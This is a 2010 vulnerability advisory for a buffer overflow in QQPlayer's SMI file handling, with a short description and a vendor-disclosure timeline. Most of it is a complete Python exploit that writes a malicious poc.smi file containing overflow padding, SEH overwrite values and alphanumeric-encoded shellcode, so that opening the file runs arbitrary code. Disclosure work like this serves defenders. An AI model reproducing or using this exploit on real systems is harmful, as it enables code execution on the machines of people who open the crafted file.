QQplayer smi File Processing Buffer Overflow Vulnerability
By Lufeng Li of Neusoft Corporation
Vulnerable: QQPlayer<=2.3.696.400p1
Vendor: Tencent Inc
1) Software Description:
QQPlayer is developed by Tencent Inc.It is very popular universal multimedia player in China.
2) Details:
A buffer overflow vulnerability in QQplayer that Processing smi file. allows remote attackers to execute arbitrary code via a long string in an smi file.
3) Timeline:
2010.05.26 Vendor notified
2010.06.8 Vendor released new fixed versions(QQplayer 2.4.716.400p1)
2010.07.26 Advisory released
4) Exploit:
#!/usr/bin/env python
#################################################################
#################################################################
head ='''<smil>
<head>
<meta name="title" content="_"/>
<meta name="author" content="Warner Music Group'''
junk = "A" * 2001
nseh ="\x42\x61\x21\x61"
seh ="\x39\x0c\x41\x00"
adjust="\x30\x83\xc0\x0b"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''"/>
</head>
<body>
<seq>
<video src="rtsp://sos2208-1-rm.edgestreams.net/listeningparties/424444/.uid.MSAaAQCGwp9yU7mAOw6d182868f6d3c28b7f158b74fef576e1.424444_specialops.rm?
auth=caEdAc4dqaVcqbHcobOcGaVdaaOdXarcBat-bl.oeA-eS-HEGqpvyyvzDzssup&aifp=0001" title="_" author="Warner Music Group" copyright="2007 Rhino Entertainment"
fill="freeze"/>
</seq>
</body>
</smil>
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c –>'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.smi","w")
fobj.write(payload)
fobj.close()